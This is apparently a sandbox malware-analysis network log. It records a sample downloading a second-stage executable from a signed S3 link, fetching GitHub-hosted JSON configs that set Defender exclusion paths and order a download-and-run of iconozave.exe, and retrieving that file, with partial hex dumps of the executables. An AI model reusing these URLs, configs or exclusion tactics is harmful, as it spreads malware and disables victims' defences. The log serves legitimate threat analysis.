                                                X-Usage-Quota-Remaining: 998923.218
                                                X-Usage-Request-Cost: 1095.63
                                                X-Usage-User-Time: 0.020974
                                                X-Usage-System-Time: 0.011895
                                                X-Usage-Input-Ops: 0
                                                X-Usage-Output-Ops: 0
                                                Age: 0
                                                X-Cache: MISS
                                                X-Content-Type-Options: nosniff
                                                X-Xss-Protection: 1; mode=block
                                                Atl-Traceid: b4582ced187d484eb0f1469616170840
                                                Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.44973352.216.51.2334437612C:\Users\user\Desktop\UBONg7lmVR.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-27 11:05:47 UTC1211OUTGET /5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-4f05-aba3-c7f453357584/Updated11.12.exe?response-content-disposition=attachment%3B%20filename%3D%22Updated11.12.exe%22&AWSAccessKeyId=ASIA6KOSE3BNM7G6QD3X&Signature=axhudmqEvDM%2FSUhiHDRgUnl7%2FLM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIBPQNDA%2Bh4G46KXw4LFfA9Io2JrUo7qexVGkmClXZ9XZAiEArKzvP5lXvxR0bzw4zii8AXSrZI4T8YzSZDU5HRHXvGAqpwIIFBAAGgw5ODQ1MjUxMDExNDYiDBQ5D%2BO3Og5loUNzrCqEAlNSqyxdg90lqENE7Z1SnCpP6CAEKvQ2ZHflx5%2B9h97EGF%2BXeWo6gNL%2FKeau4g9mlbbEotcMw%2BrrPvVtwNlOZZrAvPyqKCz9MZpRG%2BpiC03DY8EyD%2BgUcSrXtsYVj1pY8epvtBzRmE%2FiDtiuZev9AlPjjVReOc21XzmG2S5RzBnktovq9Demuoz4DZKVKfYpiyX89uYSRKAsxMv%2FByN7IdIq6qCZVRx0QazWdIaUsZX5xlSjdEpSJPis3lWADR%2FBDkpX3wpSdaWD8PCizYGKT%2F2E2%2FTQ6T9aJkUzXz9IvClo4ct3sHAuc3qQYEfeMTJWLjMFtZKl8vhj%2BumqVAPYpTlp6oAVMNfjtrYGOp0BKT9YWtFy1GR5MK5hXid7YqSJRvsd%2FwKLvb%2BM6KMzyorpcCHfTbjl0lcEiPM9exK3azj%2BG9Z6KbEtKqhP2JBh1l8nNQ0B8rOE9SFVdCbfZZDWbRo0WGaMriccmr%2FYO0vC% [TRUNCATED]
                                                Host: bbuseruploads.s3.amazonaws.com
                                                Connection: Keep-Alive
                                                2024-08-27 11:05:47 UTC546INHTTP/1.1 200 OK
                                                x-amz-id-2: dx92nqmal5BChswhOrzMbv24rk05Y0l9zY2K+If8WYJI6kxlc4sHWau0ZqdUlvpbzIyNyGTLg9s=
                                                x-amz-request-id: KP6WQX6Q8E1ZASKR
                                                Date: Tue, 27 Aug 2024 11:05:48 GMT
                                                Last-Modified: Mon, 26 Aug 2024 20:19:25 GMT
                                                ETag: "a499c507987982c951093e21df0c0d96"
                                                x-amz-server-side-encryption: AES256
                                                x-amz-version-id: izy_Ds9c9HofVlO8w4O6Dv7xs.26iHyB
                                                Content-Disposition: attachment; filename="Updated11.12.exe"
                                                Accept-Ranges: bytes
                                                Content-Type: application/x-msdownload
                                                Server: AmazonS3
                                                Content-Length: 8077824
                                                Connection: close
                                                2024-08-27 11:05:47 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0f 00 00 00 00 00 00 8a 75 00 cc 1d 00 00 f0 00 22 00 0b 02 03 00 00 7e 26 00 00 d4 03 00 00 00 00 00 a0 dc 06 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 b0 84 00 00 06 00 00 00 00 00 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdu"~&@`
                                                2024-08-27 11:05:47 UTC478INData Raw: 49 3b 66 10 0f 86 c1 00 00 00 55 48 89 e5 48 83 ec 28 48 8b 10 48 85 d2 74 72 48 83 7a 18 00 90 74 73 0f b6 72 17 40 f6 c6 20 74 30 48 8d 70 08 48 b9 21 a6 56 6a a1 6e 75 00 48 31 d9 48 89 d0 48 89 f3 e8 b8 00 00 00 48 ba bf 63 8f bb 6b ef 52 00 48 0f af c2 48 83 c4 28 5d c3 48 8b 70 08 48 b9 21 a6 56 6a a1 6e 75 00 48 31 d9 48 89 d0 48 89 f3 e8 88 00 00 00 48 ba bf 63 8f bb 6b ef 52 00 48 0f af c2 48 83 c4 28 5d c3 48 89 d8 48 83 c4 28 5d c3 48 89 d0 e8 e3 c7 05 00 b9 18 00 00 00 48 89 c7 48 89 de 31 c0 48 8d 1d 82 1e 2e 00 e8 4a ea 04 00 e8 e5 70 00 00 48 89 c3 48 8d 05 db 18 29 00 e8 f6 3e 03 00 90 48 89 44 24 08 48 89 5c 24 10 e8 a6 5c 06 00 48 8b 44 24 08 48 8b 5c 24 10 e9 17 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                Data Ascii: I;fUHH(HHtrHztsr@ t0HpH!VjnuH1HHHckRHH(]HpH!VjnuH1HHHckRHH(]HH(]HHH1H.JpHH)>HD$H\$\HD$H\$
                                                2024-08-27 11:05:47 UTC16384INData Raw: 10 90 48 83 fa 04 74 2b 48 83 fa 08 75 11 48 89 d8 48 89 cb e8 e9 79 06 00 48 83 c4 58 5d c3 48 89 d8 48 89 cb 48 89 d1 e8 55 79 06 00 48 83 c4 58 5d c3 48 89 d8 48 89 cb e8 84 79 06 00 48 83 c4 58 5d c3 48 8b 54 24 50 48 83 c2 18 48 8b 74 24 40 48 ff ce 48 8b 5c 24 70 48 89 c1 0f 1f 44 00 00 48 85 f6 7e 53 48 89 74 24 40 48 89 4c 24 38 48 89 54 24 50 48 8b 02 48 8b 4a 08 48 89 4c 24 48 48 8b 5a 10 48 89 5c 24 30 e8 d2 c5 ff ff 84 c0 74 07 48 8b 44 24 38 eb a9 48 8b 54 24 70 48 8b 74 24 30 48 8d 1c 16 48 8b 44 24 48 48 8b 4c 24 38 e8 6a fe ff ff eb 8a 48 89 c8 48 83 c4 58 5d c3 48 8b 70 30 48 8b 3e 48 0f af fa 48 01 df 48 ff c2 48 89 54 24 28 48 89 f0 48 89 fb 0f 1f 00 e8 3b fe ff ff 48 8b 5c 24 70 48 8b 54 24 28 48 89 c1 48 8b 44 24 68 48 39 50 40 77 c4
                                                Data Ascii: Ht+HuHHyHX]HHHUyHX]HHyHX]HT$PHHt$@HH\$pHDH~SHt$@HL$8HT$PHHJHL$HHZH\$0tHD$8HT$pHt$0HHD$HHL$8jHHX]Hp0H>HHHHT$(HH;H\$pHT$(HHD$hH9P@w
                                                2024-08-27 11:05:47 UTC1024INData Raw: 5c 24 70 48 8b 4c 24 48 48 8d 3d d1 23 2e 00 be 20 00 00 00 e8 09 a9 04 00 eb 1d 31 c0 48 8b 5c 24 70 48 8b 4c 24 48 48 8d 3d ae 14 2e 00 be 1e 00 00 00 e8 ea a8 04 00 48 81 c4 f8 00 00 00 5d c3 48 8d bc 24 98 00 00 00 48 8d 7f e0 48 89 6c 24 f0 48 8d 6c 24 f0 e8 11 41 06 00 48 8b 6d 00 48 c7 84 24 a0 00 00 00 16 00 00 00 48 8d 15 9c c9 2d 00 48 89 94 24 98 00 00 00 48 89 9c 24 b0 00 00 00 48 89 84 24 a8 00 00 00 48 c7 84 24 c0 00 00 00 08 00 00 00 48 8d 15 28 59 2d 00 48 89 94 24 b8 00 00 00 48 8b 54 24 60 48 89 94 24 d0 00 00 00 48 8b 94 24 88 00 00 00 48 89 94 24 c8 00 00 00 48 c7 84 24 e0 00 00 00 11 00 00 00 48 8d 15 b4 99 2d 00 48 89 94 24 d8 00 00 00 48 8b 51 18 48 8b 71 20 48 89 b4 24 f0 00 00 00 48 89 94 24 e8 00 00 00 31 c0 48 8d 9c 24 98 00 00
                                                Data Ascii: \$pHL$HH=#. 1H\$pHL$HH=.H]H$HHl$Hl$AHmH$H-H$H$H$H$H(Y-H$HT$`H$H$H$H$H-H$HQHq H$H$1H$
                                                2024-08-27 11:05:47 UTC16384INData Raw: 00 00 80 fa 78 0f 85 97 00 00 00 84 c9 74 75 48 85 c0 7d 66 49 8d 50 01 48 39 d6 73 50 48 89 f8 48 89 d3 48 89 f1 bf 01 00 00 00 48 8d 35 90 c6 27 00 e8 6b 67 04 00 4c 8b 8c 24 e8 00 00 00 4c 8b 94 24 28 01 00 00 4c 8b 9c 24 10 01 00 00 48 89 da 48 89 c7 48 89 ce 48 8b 84 24 18 01 00 00 0f b6 4c 24 6b 48 8b 9c 24 20 01 00 00 c6 44 3a ff 2d 49 89 c4 49 f7 dc eb 10 4c 89 c2 49 89 c4 66 90 eb 06 4c 89 c2 49 89 c4 44 0f 11 7c 24 57 44 0f 11 7c 24 5b 41 b8 13 00 00 00 e9 2a 02 00 00 90 80 fa 79 0f 85 85 00 00 00 48 85 db 7d 66 49 8d 50 01 48 39 d6 73 50 48 89 f8 48 89 d3 48 89 f1 bf 01 00 00 00 48 8d 35 f4 c5 27 00 e8 cf 66 04 00 4c 8b 8c 24 e8 00 00 00 4c 8b 94 24 28 01 00 00 4c 8b 9c 24 10 01 00 00 48 89 da 48 89 c7 48 89 ce 48 8b 84 24 18 01 00 00 0f b6 4c
                                                Data Ascii: xtuH}fIPH9sPHHHH5'kgL$L$(L$HHHH$L$kH$ D:-IILIfLID|$WD|$[A*yH}fIPH9sPHHHH5'fL$L$(L$HHHH$L
                                                2024-08-27 11:05:47 UTC1024INData Raw: 8b 36 4d 8b 36 b8 80 96 98 00 e8 73 8d 02 00 85 c0 7c c4 eb a7 cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 51 55 48 89 e5 48 83 ec 20 49 8b 4e 30 4c 89 f2 48 39 11 75 2b 48 89 44 24 30 48 89 5c 24 38 48 89 c8 e8 74 90 02 00 48 8b 44 24 30 48 8b 5c 24 38 31 c9 31 ff e8 41 fd ff ff 48 83 c4 20 5d c3 48 8d 05 31 73 2d 00 bb 14 00 00 00 e8 2a c5 02 00 90 48 89 44 24 08 48 89 5c 24 10 e8 1a d7 05 00 48 8b 44 24 08 48 8b 5c 24 10 eb 8e cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 65 55 48 89 e5 48 83 ec 28 49 8b 4e 30 4c 89 f2 48 39 11 74 3f 48 89 44 24 38 48 89 5c 24 40 48 89 c8 e8 f4 8f 02 00 e8 4f 7b 03 00 48 8b 44 24 38 48 8b 5c 24 40 31 c9 31 ff 90 e8 bb fc ff ff 88 44 24 27 e8 32 a1 05 00 0f b6 44 24 27 48 83 c4 28 5d c3 48 8d 05 99
                                                Data Ascii: 6M6s|I;fvQUHH IN0LH9u+HD$0H\$8HtHD$0H\$811AH ]H1s-*HD$H\$HD$H\$I;fveUHH(IN0LH9t?HD$8H\$@HO{HD$8H\$@11D$'2D$'H(]H
                                                2024-08-27 11:05:47 UTC16384INData Raw: 00 00 e8 3b dc 02 00 48 8d 05 22 5c 2d 00 bb 12 00 00 00 e8 aa e4 02 00 48 8b 05 83 7c 59 00 0f 1f 00 e8 db e1 02 00 48 8d 05 75 01 2e 00 bb 25 00 00 00 e8 8a e4 02 00 b8 00 10 00 00 0f 1f 44 00 00 e8 9b e2 02 00 48 8d 05 46 02 2d 00 bb 02 00 00 00 e8 6a e4 02 00 e8 45 dc 02 00 48 8d 05 4f 6f 2d 00 bb 14 00 00 00 e8 34 c1 02 00 e8 cf db 02 00 48 8d 05 b6 5b 2d 00 bb 12 00 00 00 0f 1f 00 e8 3b e4 02 00 48 8b 05 14 7c 59 00 e8 6f e1 02 00 48 8d 05 c9 f8 2d 00 bb 24 00 00 00 0f 1f 00 e8 1b e4 02 00 b8 00 00 08 00 e8 31 e2 02 00 48 8d 05 dc 01 2d 00 bb 02 00 00 00 0f 1f 44 00 00 e8 fb e3 02 00 e8 d6 db 02 00 48 8d 05 e0 6e 2d 00 bb 14 00 00 00 e8 c5 c0 02 00 48 8d 05 34 cc 2d 00 bb 1e 00 00 00 e8 b4 c0 02 00 48 8d 05 b7 51 2d 00 bb 11 00 00 00 e8 a3 c0 02 00
                                                Data Ascii: ;H"\-H|YHu.%DHF-jEHOo-4H[-;H|YoH-$1H-DHn-H4-HQ-
                                                2024-08-27 11:05:47 UTC1024INData Raw: 5d 90 c3 0f b7 78 52 48 8d 3c 3e 48 8d 7f f8 48 8b 37 48 85 f6 74 1e 48 89 b4 24 a0 00 00 00 0f b6 78 50 90 4c 8d 56 08 48 8d 3c fe 48 8d 7f 08 45 31 db eb 6d 0f b6 73 08 40 f6 c6 02 75 9d 48 8b 70 40 48 83 7e 08 00 74 92 0f b7 48 52 48 89 ce 48 0f af ca 48 83 c6 f8 48 03 4b 18 48 83 c1 08 90 48 89 c8 48 89 f3 e8 35 3a 00 00 48 8b 84 24 b8 00 00 00 48 8b 54 24 40 48 8b 9c 24 c0 00 00 00 4c 8b 4c 24 20 e9 50 ff ff ff 44 0f b6 60 50 44 0f b6 68 51 49 ff c3 4d 01 e2 4c 01 ef 0f 1f 00 49 83 fb 08 0f 8d 57 ff ff ff 46 0f b6 24 1e 41 80 fc 01 77 0b 42 c6 04 1e 04 eb ce 0f 1f 40 00 41 80 fc 05 0f 82 60 03 00 00 44 8b 68 54 41 0f ba e5 00 73 05 4d 8b 2a eb 03 4d 89 d5 4c 89 5c 24 28 48 89 bc 24 98 00 00 00 4c 89 ac 24 88 00 00 00 4c 89 94 24 90 00 00 00 44 0f b6
                                                Data Ascii: ]xRH<>HH7HtH$xPLVH<HE1ms@uHp@H~tHRHHHHKHHH5:H$HT$@H$LL$ PD`PDhQIMLIWF$AwB@A`DhTAsM*ML\$(H$L$L$D
                                                2024-08-27 11:05:47 UTC16384INData Raw: b6 60 50 4e 01 64 0c 58 44 0f b6 60 51 4e 01 64 0c 60 44 89 c1 4c 8b 4c 24 20 e9 6d fc ff ff 4c 89 c8 b9 02 00 00 00 e8 56 b2 05 00 48 8d 05 49 ed 2c 00 bb 0d 00 00 00 e8 65 7d 02 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 e8 50 8f 05 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 90 e9 7b fa ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 9e 00 00 00 55 48 89 e5 48 8b 50 20 48 8d 72 01 48 89 70 20 48 81 c2 01 04 00 00 48 39 d1 48 0f 42 d1 eb 07 48 ff c6 48 89 70 20 48 8b 70 20 48 39 d6 74 19 0f b7 7b 52 48 0f af fe 48 03 78 18 0f b6 3f 83 c7 fe 90 40 80 ff 03 72 d7 48 39 f1 75 4e 83 3d 41 3b 59 00 00 90 74 0c 48 8b 48 18 e8 d5 ad 05 00 49 89 0b 48 c7 40 18 00 00 00 00 48 8b 48 28 48 85 c9
                                                Data Ascii: `PNdXD`QNd`DLL$ mLVHI,e}HD$H\$HL$PHD$H\$HL${I;fUHHP HrHp HH9HBHHp Hp H9t{RHHx?@rH9uN=A;YtHHIH@HH(H
                                                2024-08-27 11:05:47 UTC1024INData Raw: 89 44 24 28 84 00 c6 04 02 a1 48 89 c3 48 8b 44 24 40 e8 6b 00 00 00 48 8b 5c 24 28 48 8b 4c 24 20 0f b6 0c 19 80 f9 a1 75 06 48 83 c4 30 5d c3 48 8d 05 be 2c 2d 00 bb 1b 00 00 00 e8 61 3d 02 00 48 89 d0 e8 39 72 05 00 ba 00 00 00 40 e8 8f 72 05 00 90 48 89 44 24 08 48 89 5c 24 10 0f 1f 40 00 e8 3b 4f 05 00 48 8b 44 24 08 48 8b 5c 24 10 e9 2c ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 48 89 e5 48 89 d9 31 d2 31 f6 e9 12 01 00 00 4c 89 e1 4c 89 c8 4c 89 d3 e9 04 01 00 00 0f b6 38 90 49 89 f8 83 e7 7f 4c 8d 48 01 41 0f ba e0 07 72 14 48 85 ff 0f 84 f1 00 00 00 48 c1 ef 03 31 c0 e9 65 03 00 00 48 85 ff 75 09 31 c0 31 ff e9 e2 02 00 00 31 c0 45 31 c0 e9 f0 00 00 00 48 0f af c7 48 83 ff 39 77 10 90 4c 8d 43 ff 48 89 d1 49 89 f2 e9 5f 01 00 00 48 29 d7 4c
                                                Data Ascii: D$(HHD$@kH\$(HL$ uH0]H,-a=H9r@rHD$H\$@;OHD$H\$,UHH11LLL8ILHArHH1eHu111E1HH9wLCHI_H)L


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.449737185.199.111.1334437992C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-27 11:05:54 UTC140OUTGET /workhasf/kelm/main/yjsefceawd.json HTTP/1.1
                                                Host: raw.githubusercontent.com
                                                User-Agent: Go-http-client/1.1
                                                Accept-Encoding: gzip
                                                2024-08-27 11:05:54 UTC897INHTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 254
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "2b7d5e7976210b6b6243eb731562fda7633790a0d3e8fe06e97c427ca3df3b40"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: C138:B7845:695157:749E29:66CDB080
                                                Accept-Ranges: bytes
                                                Date: Tue, 27 Aug 2024 11:05:54 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-ewr-kewr1740026-EWR
                                                X-Cache: HIT
                                                X-Cache-Hits: 0
                                                X-Timer: S1724756754.290051,VS0,VE47
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 0e29a9fb76c2652e13e82cf7cca1cb75ccd83a89
                                                Expires: Tue, 27 Aug 2024 11:10:54 GMT
                                                Source-Age: 0
                                                2024-08-27 11:05:54 UTC254INData Raw: 7b 0d 0a 20 20 22 66 6f 6c 64 65 72 5f 70 61 74 68 22 3a 20 22 43 3a 5c 5c 52 65 6b 61 22 2c 0d 0a 20 20 22 61 64 64 5f 65 78 63 6c 75 73 69 6f 6e 73 22 3a 20 74 72 75 65 2c 0d 0a 20 20 22 65 78 63 6c 75 73 69 6f 6e 5f 70 61 74 68 73 22 3a 20 5b 0d 0a 20 20 20 20 22 43 3a 5c 5c 55 73 65 72 73 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 20 28 78 38 36 29 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 52 65 63 6f 76 65 72 79 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 52 65 6b 61 22 2c 0d 0a 20 20 20 20 22 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 5c 44 65 73 6b 74 6f 70 22 0d 0a 20 20 5d 0d 0a 7d
                                                Data Ascii: { "folder_path": "C:\\Reka", "add_exclusions": true, "exclusion_paths": [ "C:\\Users", "C:\\Windows", "C:\\Program Files", "C:\\Program Files (x86)", "C:\\Recovery", "C:\\Reka", "%USERPROFILE%\\Desktop" ]}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.449738185.199.111.1334437992C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-27 11:05:54 UTC141OUTGET /workhasf/kelm/main/nepipirusas.json HTTP/1.1
                                                Host: raw.githubusercontent.com
                                                User-Agent: Go-http-client/1.1
                                                Accept-Encoding: gzip
                                                2024-08-27 11:05:55 UTC898INHTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 271
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "8afdee626e191786c845a423ef408c35314075f4a1c4350f44a55f7503d99b00"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: F629:28EE07:6F5FBC:7AAC5E:66CDB08B
                                                Accept-Ranges: bytes
                                                Date: Tue, 27 Aug 2024 11:05:54 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-ewr-kewr1740058-EWR
                                                X-Cache: HIT
                                                X-Cache-Hits: 0
                                                X-Timer: S1724756755.934187,VS0,VE57
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 26bd0ffca3bb2fe4ba322dd6e746cb37518d9bf8
                                                Expires: Tue, 27 Aug 2024 11:10:54 GMT
                                                Source-Age: 0
                                                2024-08-27 11:05:55 UTC271INData Raw: 7b 0d 0a 20 20 22 64 6f 77 6e 6c 6f 61 64 73 22 3a 20 5b 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 22 64 6f 77 6e 6c 6f 61 64 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 77 6f 72 6b 68 61 73 66 2f 6b 65 6c 6d 2f 72 61 77 2f 6d 61 69 6e 2f 69 63 6f 6e 6f 7a 61 76 65 2e 65 78 65 22 2c 0d 0a 20 20 20 20 20 20 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 20 22 72 61 70 6e 65 77 73 61 2e 65 78 65 22 2c 0d 0a 20 20 20 20 20 20 22 72 75 6e 22 3a 20 74 72 75 65 0d 0a 20 20 20 20 7d 2c 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 22 64 6f 77 6e 6c 6f 61 64 5f 75 72 6c 22 3a 20 22 22 2c 0d 0a 20 20 20 20 20 20 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 20 22 64 6c 6c 2e 65 78 65 22 2c 0d 0a 20 20 20 20 20 20 22 72 75 6e 22 3a 20 66 61 6c 73
                                                Data Ascii: { "downloads": [ { "download_url": "https://github.com/workhasf/kelm/raw/main/iconozave.exe", "file_name": "rapnewsa.exe", "run": true }, { "download_url": "", "file_name": "dll.exe", "run": fals


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.449747140.82.121.34437992C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-27 11:07:20 UTC127OUTGET /workhasf/kelm/raw/main/iconozave.exe HTTP/1.1
                                                Host: github.com
                                                User-Agent: Go-http-client/1.1
                                                Accept-Encoding: gzip
                                                2024-08-27 11:07:20 UTC547INHTTP/1.1 302 Found
                                                Server: GitHub.com
                                                Date: Tue, 27 Aug 2024 11:07:20 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                Access-Control-Allow-Origin:
                                                Location: https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe
                                                Cache-Control: no-cache
                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                X-Frame-Options: deny
                                                X-Content-Type-Options: nosniff
                                                X-XSS-Protection: 0
                                                Referrer-Policy: no-referrer-when-downgrade
                                                2024-08-27 11:07:20 UTC3261INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.449748185.199.111.1334437992C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-27 11:07:21 UTC204OUTGET /workhasf/kelm/main/iconozave.exe HTTP/1.1
                                                Host: raw.githubusercontent.com
                                                User-Agent: Go-http-client/1.1
                                                Referer: https://github.com/workhasf/kelm/raw/main/iconozave.exe
                                                Accept-Encoding: gzip
                                                2024-08-27 11:07:21 UTC899INHTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 38912
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: application/octet-stream
                                                ETag: "12c37a0d92e3f8714d00d8ffa40d644b8e2520270caa1a870ac073d1e42f9dd0"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: 97AB:2BC85:40E203:48916A:66CDB363
                                                Accept-Ranges: bytes
                                                Date: Tue, 27 Aug 2024 11:07:21 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-nyc-kteb1890075-NYC
                                                X-Cache: MISS
                                                X-Cache-Hits: 0
                                                X-Timer: S1724756841.382007,VS0,VE99
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 354c32c8894117551a6f03a6326ac843843e7e37
                                                Expires: Tue, 27 Aug 2024 11:12:21 GMT
                                                Source-Age: 0
                                                2024-08-27 11:07:21 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f1 8e cb ea b5 ef a5 b9 b5 ef a5 b9 b5 ef a5 b9 b3 6e a6 b8 b1 ef a5 b9 fe 97 a4 b8 b8 ef a5 b9 b5 ef a4 b9 a0 ef a5 b9 da 6e a1 b8 a9 ef a5 b9 da 6e a7 b8 b4 ef a5 b9 52 69 63 68 b5 ef a5 b9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 50 53 cc 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 26 00 84 00 00 00 14 00 00 00 00 00 00 30 1d 00 00 00 10 00
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$nnnRichPELPSf&0
